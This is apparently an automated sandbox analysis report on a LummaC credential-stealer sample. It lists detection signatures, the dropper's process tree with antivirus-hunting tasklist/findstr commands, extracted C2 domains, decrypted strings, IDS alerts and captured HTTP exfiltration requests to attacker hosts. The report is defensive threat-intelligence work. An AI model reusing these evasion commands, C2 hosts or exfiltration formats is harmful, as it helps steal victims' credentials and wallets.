Edit tour

Windows Analysis Report
es5qBEFupj.exe

Overview

General Information

Sample name:	es5qBEFupj.exe renamed because original name is a hash value
Original sample name:	25c8f6ada1179e3fcf486844e5c1ed24.exe
Analysis ID:	1581590
MD5:	25c8f6ada1179e3fcf486844e5c1ed24
SHA1:	286fa29c9a674651b445e465309c21c99e2d5b95
SHA256:	8077581cfece59ca6d8e06d5bedde9664014531a091d3c15732aeae4679dd40e
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

es5qBEFupj.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\es5qBEFupj.exe" MD5: 25C8F6ADA1179E3FCF486844E5C1ED24)

PasoCattle.exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)

cmd.exe (PID: 7284 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7560 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7568 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7648 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7712 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7728 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7748 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7764 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Climb.com (PID: 7780 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 7800 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Set-up.exe (PID: 7224 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "5FwhVM--lll"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Climb.com PID: 7780	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Climb.com PID: 7780	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Climb.com PID: 7780	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Climb.com PID: 7780	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.es5qBEFupj.exe.340000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x78d71d:$s1: Runner 0x78d882:$s3: RunOnStartup 0x78d731:$a1: Antis 0x78d75e:$a2: antiVM 0x78d765:$a3: antiSandbox 0x78d771:$a4: antiDebug 0x78d77b:$a5: antiEmulator 0x78d788:$a6: enablePersistence 0x78d79a:$a7: enableFakeError 0x78d8ab:$a8: DetectVirtualMachine 0x78d8d0:$a9: DetectSandboxie 0x78d8fb:$a10: DetectDebugger 0x78d90a:$a11: CheckEmulator

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7284, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7648, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:34:53.034167+0100	2028371	3	Unknown Traffic	192.168.2.7	49754	172.67.128.184	443	TCP
2024-12-28T09:34:55.202333+0100	2028371	3	Unknown Traffic	192.168.2.7	49760	172.67.128.184	443	TCP
2024-12-28T09:34:57.558546+0100	2028371	3	Unknown Traffic	192.168.2.7	49766	172.67.128.184	443	TCP
2024-12-28T09:34:59.828548+0100	2028371	3	Unknown Traffic	192.168.2.7	49772	172.67.128.184	443	TCP
2024-12-28T09:35:02.092410+0100	2028371	3	Unknown Traffic	192.168.2.7	49778	172.67.128.184	443	TCP
2024-12-28T09:35:04.435142+0100	2028371	3	Unknown Traffic	192.168.2.7	49784	172.67.128.184	443	TCP
2024-12-28T09:35:06.931421+0100	2028371	3	Unknown Traffic	192.168.2.7	49790	172.67.128.184	443	TCP
2024-12-28T09:35:10.480730+0100	2028371	3	Unknown Traffic	192.168.2.7	49801	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:34:53.947129+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49754	172.67.128.184	443	TCP
2024-12-28T09:34:55.974849+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49760	172.67.128.184	443	TCP
2024-12-28T09:35:11.270675+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49801	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:34:53.947129+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49754	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:34:55.974849+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49760	172.67.128.184	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:35:05.322094+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49784	172.67.128.184	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: es5qBEFupj.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "5FwhVM--lll"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: es5qBEFupj.exe	Virustotal: Detection: 33%			Perma Link
Source: es5qBEFupj.exe	ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: es5qBEFupj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: spuriotis.click
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 5FwhVM--lll

Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_c12715e3-1

Source: es5qBEFupj.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49801 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_00406301 FindFirstFileW,FindClose,	7_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0011DC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0012A087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0012A1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	21_2_0011E472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	21_2_0012A570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000EC622 FindFirstFileExW,	21_2_000EC622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_001266DC FindFirstFileW,FindNextFileW,FindClose,	21_2_001266DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00127333 FindFirstFileW,FindClose,	21_2_00127333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_001273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	21_2_001273D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0011D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\768400\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49784 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49760 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49760 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49754 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49754 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49801 -> 172.67.128.184:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: spuriotis.click
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 444328Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 36 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View

IP Address: 34.226.108.155 34.226.108.155

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49760 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49766 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49772 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49778 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49790 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49801 -> 172.67.128.184:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PUFJDD4WX8DV89CDT6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F4ETTRT10471MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15044Host: spuriotis.click
